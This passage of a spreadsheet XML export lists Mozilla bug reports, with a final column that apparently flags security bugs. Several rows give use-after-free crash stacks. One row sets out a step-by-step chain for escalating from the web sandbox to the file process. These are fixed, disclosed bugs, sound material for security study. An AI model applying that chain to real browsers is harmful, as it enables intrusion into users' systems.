      </c>
      <c r="T3211" t="n">
        <v>1</v>
      </c>
      <c r="U3211" t="n">
        <v>0</v>
      </c>
      <c r="V3211" t="n">
        <v>6</v>
      </c>
      <c r="W3211" t="inlineStr">
        <is>
          <t>The commands "Select all" and "New message" have the same assigned shortcut - CTRL+A.
TB 31.6.0 openSUSE Linux.</t>
        </is>
      </c>
      <c r="X3211" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3212">
      <c r="A3212" t="n">
        <v>1846197</v>
      </c>
      <c r="B3212" t="inlineStr">
        <is>
          <t>2023-07-30 17:04:26 -0700</t>
        </is>
      </c>
      <c r="C3212" t="inlineStr">
        <is>
          <t>Crash in [@ icu_73::umtx_atomic_dec]</t>
        </is>
      </c>
      <c r="D3212" t="inlineStr">
        <is>
          <t>2024-04-28 23:34:57 -0700</t>
        </is>
      </c>
      <c r="E3212" t="n">
        <v>1</v>
      </c>
      <c r="F3212" t="n">
        <v>1</v>
      </c>
      <c r="G3212" t="n">
        <v>3</v>
      </c>
      <c r="H3212" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3212" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3212" t="inlineStr">
        <is>
          <t>JavaScript: Internationalization API</t>
        </is>
      </c>
      <c r="K3212" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3212" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3212" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3212" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3212" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3212" t="inlineStr">
        <is>
          <t>[adv-esr115.9+r]</t>
        </is>
      </c>
      <c r="Q3212" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3212" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S3212" t="inlineStr">
        <is>
          <t>121 Branch</t>
        </is>
      </c>
      <c r="T3212" t="n">
        <v>1</v>
      </c>
      <c r="U3212" t="n">
        <v>0</v>
      </c>
      <c r="V3212" t="n">
        <v>18</v>
      </c>
      <c r="W3212" t="inlineStr">
        <is>
          <t>Most of these reports are showing as UAFs.
Crash report: https://crash-stats.mozilla.org/report/index/7be9b933-bd0f-438f-a4c6-aad480230730
Reason: ```EXCEPTION_ACCESS_VIOLATION_READ```
Top 10 frames of crashing thread:
```
0  xul.dll  std::_Atomic_integral&lt;int, 4&gt;::fetch_add  /builds/worker/fetches/vs/VC/Tools/MSVC/14.29.30133/include/atomic:1536
0  xul.dll  std::_Atomic_integral_facade&lt;int&gt;::fetch_sub  /builds/worker/fetches/vs/VC/Tools/MSVC/14.29.30133/include/atomic:1755
0  xul.dll  icu_73::umtx_atomic_dec  intl/icu/source/common/umutex.h:96
0  xul.dll  icu_73::UnicodeString::removeRef  intl/icu/source/common/unistr.cpp:128
0  xul.dll  icu_73::UnicodeString::releaseArray  intl/icu/source/common/unistr.cpp:138
0  xul.dll  icu_73::UnicodeString::~UnicodeString  intl/icu/source/common/unistr.cpp:439
1  xul.dll  icu_73::DecimalFormatSymbols::~DecimalFormatSymbols  intl/icu/source/i18n/dcfmtsym.cpp:139
2  xul.dll  icu_73::DecimalFormatSymbols::~DecimalFormatSymbols  intl/icu/source/i18n/dcfmtsym.cpp:138
3  xul.dll  icu_73::LocalPointer&lt;const icu_73::DecimalFormatSymbols&gt;::adoptInstead  intl/icu/source/common/unicode/localpointer.h:301
3  xul.dll  icu_73::DecimalFormat::touch  intl/icu/source/i18n/decimfmt.cpp:1639
```</t>
        </is>
      </c>
      <c r="X3212" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3213">
      <c r="A3213" t="n">
        <v>529428</v>
      </c>
      <c r="B3213" t="inlineStr">
        <is>
          <t>2009-11-17 16:23:44 -0800</t>
        </is>
      </c>
      <c r="C3213" t="inlineStr">
        <is>
          <t>Test Pilot data upload page needs an option to 'always submit' or 'never submit'</t>
        </is>
      </c>
      <c r="D3213" t="inlineStr">
        <is>
          <t>2016-05-10 13:13:22 -0700</t>
        </is>
      </c>
      <c r="E3213" t="n">
        <v>1</v>
      </c>
      <c r="F3213" t="n">
        <v>1</v>
      </c>
      <c r="G3213" t="n">
        <v>6</v>
      </c>
      <c r="H3213" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3213" t="inlineStr">
        <is>
          <t>Mozilla Labs Graveyard</t>
        </is>
      </c>
      <c r="J3213" t="inlineStr">
        <is>
          <t>Test Pilot</t>
        </is>
      </c>
      <c r="K3213" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3213" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3213" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3213" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3213" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3213" t="inlineStr"/>
      <c r="Q3213" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3213" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3213" t="inlineStr">
        <is>
          <t>0.4</t>
        </is>
      </c>
      <c r="T3213" t="n">
        <v>1</v>
      </c>
      <c r="U3213" t="n">
        <v>0</v>
      </c>
      <c r="V3213" t="n">
        <v>2</v>
      </c>
      <c r="W3213" t="inlineStr">
        <is>
          <t>For the week-in-the-life study, which automatically repeats, people will get annoyed if every time it completes they get a notification and have to click upload.  There should be an option to "always upload", which a user can click once they've decided that the experiment is trustworthy, after which that particular experiment just always gets uploaded from then on.
Note that there also has to be a UI for changing this always-upload setting, in case you change your mind later.</t>
        </is>
      </c>
      <c r="X3213" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3214">
      <c r="A3214" t="n">
        <v>1538028</v>
      </c>
      <c r="B3214" t="inlineStr">
        <is>
          <t>2019-03-21 15:55:27 -0700</t>
        </is>
      </c>
      <c r="C3214" t="inlineStr">
        <is>
          <t>Privilege escalation from web to file process</t>
        </is>
      </c>
      <c r="D3214" t="inlineStr">
        <is>
          <t>2024-05-30 09:57:40 -0700</t>
        </is>
      </c>
      <c r="E3214" t="n">
        <v>1</v>
      </c>
      <c r="F3214" t="n">
        <v>1</v>
      </c>
      <c r="G3214" t="n">
        <v>3</v>
      </c>
      <c r="H3214" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3214" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3214" t="inlineStr">
        <is>
          <t>DOM: Navigation</t>
        </is>
      </c>
      <c r="K3214" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3214" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3214" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3214" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3214" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3214" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][post-critsmash-triage][adv-main109+]</t>
        </is>
      </c>
      <c r="Q3214" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3214" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S3214" t="inlineStr">
        <is>
          <t>109 Branch</t>
        </is>
      </c>
      <c r="T3214" t="n">
        <v>1</v>
      </c>
      <c r="U3214" t="n">
        <v>0</v>
      </c>
      <c r="V3214" t="n">
        <v>41</v>
      </c>
      <c r="W3214" t="inlineStr">
        <is>
          <t>This was found via manual analysis of the sandbox code of Firefox 65. I am currently not able to get a Windows debug build for Firefox 66, but I assume the flaw still exists.
Given a renderer exploit, we can perform the following steps:
1. Hook CheckLoadURIWithPrincipal to always return true.
2. Hook PopupBlocker::CanShowPopupByPermission to always allow.
3. Load file:///path/to/stage1.html in an iframe.
   stage1.html file must be readable from within the web sandbox,
   either drop it to temp dir sContentTempDir, or use a UNC path on Windows.
   Every action performed from this document will be associated with
   a security principal for a file:/// origin.
4. In stage1.html, we can do window.open('file:///path/to/stage2.html')
   This will create a new FILE_REMOTE_TYPE process.
5. Now re-exploit the new renderer from stage2.html.
Similar to my Pwn2Own bug, steps 1-4 can probably be replaced by appropriate IPC/message manager/XPCOM usage which I have not investigated in detail.
We escalated privileges, because a file process can:
* Access all files [1]
* On Windows, access a USER_NON_ADMIN token, rather than USER_PROTECTED [2]
[1]: https://github.com/mozilla/gecko-dev/blob/177fb00ebaaf69857d8f04334b46a107feb212ac/security/sandbox/win/src/sandboxbroker/sandboxBroker.cpp#L505
[2]: https://github.com/mozilla/gecko-dev/blob/177fb00ebaaf69857d8f04334b46a107feb212ac/security/sandbox/win/src/sandboxbroker/sandboxBroker.cpp#L419</t>
        </is>
      </c>
      <c r="X3214" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3215">
      <c r="A3215" t="n">
        <v>1404335</v>
      </c>
      <c r="B3215" t="inlineStr">
        <is>
          <t>2017-09-29 07:16:46 -0700</t>
        </is>
      </c>
      <c r="C3215" t="inlineStr">
        <is>
          <t>Tab counter is incorrectly displayed for a few seconds when switching between Normal Browsing and Private Browsing</t>
        </is>
      </c>
      <c r="D3215" t="inlineStr">
        <is>
          <t>2017-10-27 08:21:10 -0700</t>
        </is>
      </c>
      <c r="E3215" t="n">
        <v>1</v>
      </c>
      <c r="F3215" t="n">
        <v>1</v>
      </c>
      <c r="G3215" t="n">
        <v>2</v>
      </c>
      <c r="H3215" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3215" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J3215" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3215" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3215" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M3215" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N3215" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3215" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3215" t="inlineStr"/>
      <c r="Q3215" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3215" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3215" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3215" t="n">
        <v>1</v>
      </c>
      <c r="U3215" t="n">
        <v>0</v>
      </c>
      <c r="V3215" t="n">
        <v>4</v>
      </c>
      <c r="W3215" t="inlineStr">
        <is>
          <t>Build: 67c37667
Device: iPad mini 4
iOS: 11.0.1 
Steps to reproduce:
1. Launch the app
2. Open 2 tab in a normal browsing session
3. Tap on the mask icon a few times to switch between Normal Browsing and Private Browsing
4. Check the tab counter while repeating step 3)  
Actual results: 
- The tab counter animation is incorrectly displayed for a few seconds.  
See video: 
- https://www.youtube.com/watch?v=Lke7OASO_iA
Note:
- Issue reproducible only on iPad</t>
        </is>
      </c>
      <c r="X3215" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3216">
      <c r="A3216" t="n">
        <v>1815801</v>
      </c>
      <c r="B3216" t="inlineStr">
        <is>
          <t>2023-02-08 16:21:39 -0800</t>
        </is>
      </c>
      <c r="C3216" t="inlineStr">
        <is>
          <t>Crash in [@ soundtouch::TDStretch::seekBestOverlapPositionFull]</t>
        </is>
      </c>
      <c r="D3216" t="inlineStr">
        <is>
          <t>2023-10-17 20:36:54 -0700</t>
        </is>
      </c>
      <c r="E3216" t="n">
        <v>1</v>
      </c>
      <c r="F3216" t="n">
        <v>1</v>
      </c>
      <c r="G3216" t="n">
        <v>3</v>
      </c>
      <c r="H3216" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3216" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3216" t="inlineStr">
        <is>
          <t>Audio/Video: Playback</t>
        </is>
      </c>
      <c r="K3216" t="inlineStr">
        <is>
          <t>Firefox 110</t>
        </is>
      </c>
      <c r="L3216" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3216" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N3216" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3216" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3216" t="inlineStr">
        <is>
          <t>[adv-main110.0.1+]</t>
        </is>
      </c>
      <c r="Q3216" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3216" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S3216" t="inlineStr">
        <is>
          <t>111 Branch</t>
        </is>
      </c>
      <c r="T3216" t="n">
        <v>1</v>
      </c>
      <c r="U3216" t="n">
        <v>0</v>
      </c>
      <c r="V3216" t="n">
        <v>11</v>
      </c>
      <c r="W3216" t="inlineStr">
        <is>
          <t>Crash report: https://crash-stats.mozilla.org/report/index/6aea554a-9766-4292-ba38-07b6d0230208
This Android crash looks like a regression in Nightly 110.
I tentatively marked this as a sec bug because all the crash addresses are variations of jemalloc's UAF poison like 0xe5e5e5e5e5e5e5f5.
Reason: ```SIGSEGV / SEGV_MAPERR```
Top 10 frames of crashing thread:
```
0  liblgpllibs.so  soundtouch::TDStretch::seekBestOverlapPositionFull  media/libsoundtouch/src/TDStretch.cpp:350
1  liblgpllibs.so  soundtouch::TDStretch::processSamples  media/libsoundtouch/src/TDStretch.cpp:661
2  liblgpllibs.so  soundtouch::SoundTouch::putSamples  media/libsoundtouch/src/SoundTouch.cpp
3  libxul.so  mozilla::AudioStream::GetTimeStretched  dom/media/AudioStream.cpp:546
3  libxul.so  mozilla::AudioStream::DataCallback  dom/media/AudioStream.cpp:623
3  libxul.so  mozilla::AudioStream::DataCallback_S  dom/media/AudioStream.h:319
4  libxul.so  passthrough_resampler&lt;short&gt;::fill  media/libcubeb/src/cubeb_resampler.cpp:111
5  libxul.so  aaudio_output_data_cb  media/libcubeb/src/cubeb_aaudio.cpp:719
6  libaaudio_internal.so  libaaudio_internal.so@0x22364  
7  libaaudio_internal.so  libaaudio_internal.so@0x2432c  
```</t>
        </is>
      </c>
      <c r="X3216" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3217">
      <c r="A3217" t="n">
        <v>945939</v>
      </c>
      <c r="B3217" t="inlineStr">
        <is>
          <t>2013-12-03 13:32:26 -0800</t>
        </is>
      </c>
      <c r="C3217" t="inlineStr">
        <is>
          <t>Use-after-free or worse in ValueNumberer::lookupValue</t>
        </is>
      </c>
      <c r="D3217" t="inlineStr">
        <is>
          <t>2015-02-25 20:47:32 -0800</t>
        </is>
      </c>
      <c r="E3217" t="n">
        <v>1</v>
      </c>
      <c r="F3217" t="n">
        <v>1</v>
      </c>
      <c r="G3217" t="n">
        <v>3</v>
      </c>
      <c r="H3217" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3217" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3217" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3217" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3217" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3217" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3217" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3217" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3217" t="inlineStr">
        <is>
          <t>[qa-][adv-main27+][adv-esr24.3+]</t>
        </is>
      </c>
      <c r="Q3217" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3217" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3217" t="inlineStr">
        <is>
          <t>mozilla28</t>
        </is>
      </c>
      <c r="T3217" t="n">
        <v>1</v>
      </c>
      <c r="U3217" t="n">
        <v>0</v>
      </c>
      <c r="V3217" t="n">
        <v>18</v>
      </c>
      <c r="W3217" t="inlineStr">
        <is>
          <t>Created attachment 8341956
fix_valuenumber-v0.diff
In ValueNumberer::lookupValue, we acquire a pointer |p| into the hashtable, then breakClass -- this may (and does in practice) modify the table -- then return p-&gt;value. If breakClass's modifications cause a table resize, p-&gt;value will return a random table entry, freed garbage, or even a different threads memory. This could cause an untold litany of immediate or subtle downstream damage, but is probably quite hard to exploit in practice.
I think we want the pre-broken instruction id here instead, but I'm not familiar enough with our implementation of the algorithm to be 100% sure.</t>
        </is>
      </c>
      <c r="X3217" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3218">
      <c r="A3218" t="n">
        <v>1072162</v>
      </c>
      <c r="B3218" t="inlineStr">
        <is>
          <t>2014-09-24 01:28:57 -0700</t>
        </is>
      </c>
      <c r="C3218" t="inlineStr">
        <is>
          <t>Remove links to TBPL from Try server hghook response</t>
        </is>
      </c>
      <c r="D3218" t="inlineStr">
        <is>
          <t>2015-02-24 11:00:54 -0800</t>
        </is>
      </c>
      <c r="E3218" t="n">
        <v>1</v>
      </c>
      <c r="F3218" t="n">
        <v>1</v>
      </c>
      <c r="G3218" t="n">
        <v>5</v>
      </c>
      <c r="H3218" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3218" t="inlineStr">
        <is>
          <t>Developer Services</t>
        </is>
      </c>
      <c r="J3218" t="inlineStr">
        <is>
          <t>Mercurial: hg.mozilla.org</t>
        </is>
      </c>
      <c r="K3218" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L3218" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3218" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3218" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3218" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3218" t="inlineStr">
        <is>
          <t xml:space="preserve">[kanban:engops:https://mozilla.kanbanize.com/ctrl_board/6/702] </t>
        </is>
      </c>
      <c r="Q3218" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3218" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3218" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3218" t="n">
        <v>1</v>
      </c>
      <c r="U3218" t="n">
        <v>0</v>
      </c>
      <c r="V3218" t="n">
        <v>4</v>
      </c>
      <c r="W3218" t="inlineStr">
        <is>
          <t>Once we're ready to EOL http://tbpl.mozilla.org/ (still a way out, but filing this in readiness), we should remove the TBPL links in the response returned from hg.mozilla.org when people make a push to try.</t>
        </is>
      </c>
      <c r="X3218" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3219">
      <c r="A3219" t="n">
        <v>1256065</v>
      </c>
      <c r="B3219" t="inlineStr">
        <is>
          <t>2016-03-12 17:58:54 -0800</t>
        </is>
      </c>
      <c r="C3219" t="inlineStr">
        <is>
          <t>crash in mozilla::GMPVideoDecoder::GMPInitDone</t>
        </is>
      </c>
      <c r="D3219" t="inlineStr">
        <is>
          <t>2016-09-22 17:19:05 -0700</t>
        </is>
      </c>
      <c r="E3219" t="n">
        <v>1</v>
      </c>
      <c r="F3219" t="n">
        <v>1</v>
      </c>
      <c r="G3219" t="n">
        <v>3</v>
      </c>
      <c r="H3219" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3219" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3219" t="inlineStr">
        <is>
          <t>Audio/Video: GMP</t>
        </is>
      </c>
      <c r="K3219" t="inlineStr">
        <is>
          <t>46 Branch</t>
        </is>
      </c>
      <c r="L3219" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3219" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N3219" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3219" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3219" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main46+][adv-esr45.1+]</t>
        </is>
      </c>
      <c r="Q3219" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3219" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3219" t="inlineStr">
        <is>
          <t>mozilla48</t>
        </is>
      </c>
      <c r="T3219" t="n">
        <v>1</v>
      </c>
      <c r="U3219" t="n">
        <v>0</v>
      </c>
      <c r="V3219" t="n">
        <v>21</v>
      </c>
      <c r="W3219" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-5597f645-ecac-4afb-a2c3-2160e2160312.
=============================================================
Currently at #6 in Top Crashers for Firefox 46.0b.
Potentially exploitable:
Crash Reason 	EXCEPTION_ACCESS_VIOLATION_READ
Crash Address 	0xffffffffe5e5e5e5
All crashes are on Windows:
Operating System	Percentage
Windows 7	53.66%
Windows XP	39.02%
Windows Vista	4.07%
Windows 10	1.63%
Windows 8.1	1.63%
Seems to have started in v46:
Product	Version	Percentage
Firefox	47.0a1	58.54%
Firefox	46.0a2	18.70%
Firefox	48.0a1	15.45%
Firefox	45.0a2	3.25%
Firefox	47.0a2	2.44%
Firefox	45.0a1	0.81%
Firefox	46.0b1	0.81%
Stack:
mozilla::GMPVideoDecoder::GMPInitDone(GMPVideoDecoderProxy*, GMPVideoHost*)
mozilla::gmp::GetGMPContentParentForVideoDecoderDone::Done(mozilla::gmp::GMPContentParent*)
mozilla::gmp::RunCreateContentParentCallbacks::Run()
nsThread::ProcessNextEvent(bool, bool*)
NS_ProcessNextEvent(nsIThread*, bool)
mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*)
MessageLoop::RunHandler()
MessageLoop::Run()
nsThread::ThreadFunc(void*)
_PR_NativeRunThread</t>
        </is>
      </c>
      <c r="X3219" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3220">
      <c r="A3220" t="n">
        <v>1392264</v>
      </c>
      <c r="B3220" t="inlineStr">
        <is>
          <t>2017-08-21 06:42:49 -0700</t>
        </is>
      </c>
      <c r="C3220" t="inlineStr">
        <is>
          <t>Returning leftover http transactions after unsuccessful dispatch ruins natural ordering</t>
        </is>
      </c>
      <c r="D3220" t="inlineStr">
        <is>
          <t>2017-08-22 17:13:18 -0700</t>
        </is>
      </c>
      <c r="E3220" t="n">
        <v>1</v>
      </c>
      <c r="F3220" t="n">
        <v>1</v>
      </c>
      <c r="G3220" t="n">
        <v>3</v>
      </c>
      <c r="H3220" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3220" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3220" t="inlineStr">
        <is>
          <t>Networking: HTTP</t>
        </is>
      </c>
      <c r="K3220" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3220" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3220" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3220" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3220" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3220" t="inlineStr">
        <is>
          <t>[necko-active]</t>
        </is>
      </c>
      <c r="Q3220" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3220" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3220" t="inlineStr">
        <is>
          <t>mozilla57</t>
        </is>
      </c>
      <c r="T3220" t="n">
        <v>1</v>
      </c>
      <c r="U3220" t="n">
        <v>0</v>
      </c>
      <c r="V3220" t="n">
        <v>8</v>
      </c>
      <c r="W3220" t="inlineStr">
        <is>
          <t>This is a major perf problem.  We can't prioritize images sooner than during the layout phase which is too late, preload already kicked in most cases.  Hence, leaving trans at least in the natural order is vital to load images from the top to the bottom as they are placed in the markup (for most modern webs it usually means the order of appearance on the screen).
Will have a patch momentarily.</t>
        </is>
      </c>
      <c r="X3220" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3221">
      <c r="A3221" t="n">
        <v>1492273</v>
      </c>
      <c r="B3221" t="inlineStr">
        <is>
          <t>2018-09-18 13:47:33 -0700</t>
        </is>
      </c>
      <c r="C3221" t="inlineStr">
        <is>
          <t>Convert selectedJob to a Context</t>
        </is>
      </c>
      <c r="D3221" t="inlineStr">
        <is>
          <t>2018-11-27 05:17:58 -0800</t>
        </is>
      </c>
      <c r="E3221" t="n">
        <v>1</v>
      </c>
      <c r="F3221" t="n">
        <v>1</v>
      </c>
      <c r="G3221" t="n">
        <v>7</v>
      </c>
      <c r="H3221" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3221" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J3221" t="inlineStr">
        <is>
          <t>Treeherder: Frontend</t>
        </is>
      </c>
      <c r="K3221" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L3221" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3221" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3221" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3221" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3221" t="inlineStr"/>
      <c r="Q3221" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3221" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3221" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3221" t="n">
        <v>1</v>
      </c>
      <c r="U3221" t="n">
        <v>0</v>
      </c>
      <c r="V3221" t="n">
        <v>7</v>
      </c>
      <c r="W3221" t="inlineStr">
        <is>
          <t>Effort level 4.
Realized we needed this when converting away from the Angular event model and the ThResultSetStore.</t>
        </is>
      </c>
      <c r="X3221" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3222">
      <c r="A3222" t="n">
        <v>1200326</v>
      </c>
      <c r="B3222" t="inlineStr">
        <is>
          <t>2015-08-31 11:00:25 -0700</t>
        </is>
      </c>
      <c r="C3222" t="inlineStr">
        <is>
          <t>Assertion failure: false [@mozilla::MP4TrackDemuxer::MP4TrackDemuxer]</t>
        </is>
      </c>
      <c r="D3222" t="inlineStr">
        <is>
          <t>2016-07-02 11:19:00 -0700</t>
        </is>
      </c>
      <c r="E3222" t="n">
        <v>1</v>
      </c>
      <c r="F3222" t="n">
        <v>1</v>
      </c>
      <c r="G3222" t="n">
        <v>3</v>
      </c>
      <c r="H3222" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3222" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3222" t="inlineStr">
        <is>
          <t>Audio/Video: Playback</t>
        </is>
      </c>
      <c r="K3222" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3222" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3222" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3222" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3222" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3222" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main42+]</t>
        </is>
      </c>
      <c r="Q3222" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3222" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3222" t="inlineStr">
        <is>
          <t>mozilla44</t>
        </is>
      </c>
      <c r="T3222" t="n">
        <v>1</v>
      </c>
      <c r="U3222" t="n">
        <v>0</v>
      </c>
      <c r="V3222" t="n">
        <v>43</v>
      </c>
      <c r="W3222" t="inlineStr">
        <is>
          <t>Created attachment 8654976
call_stack.txt
Assertion failure: false, at /builds/slave/m-cen-l64-asan-d-ntly-00000000/build/src/dom/media/fmp4/MP4Demuxer.cpp:206</t>
        </is>
      </c>
      <c r="X3222" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3223">
      <c r="A3223" t="n">
        <v>758598</v>
      </c>
      <c r="B3223" t="inlineStr">
        <is>
          <t>2012-05-25 06:41:24 -0700</t>
        </is>
      </c>
      <c r="C3223" t="inlineStr">
        <is>
          <t>[Tracker] Search UX suggestions</t>
        </is>
      </c>
      <c r="D3223" t="inlineStr">
        <is>
          <t>2013-05-20 06:55:49 -0700</t>
        </is>
      </c>
      <c r="E3223" t="n">
        <v>1</v>
      </c>
      <c r="F3223" t="n">
        <v>1</v>
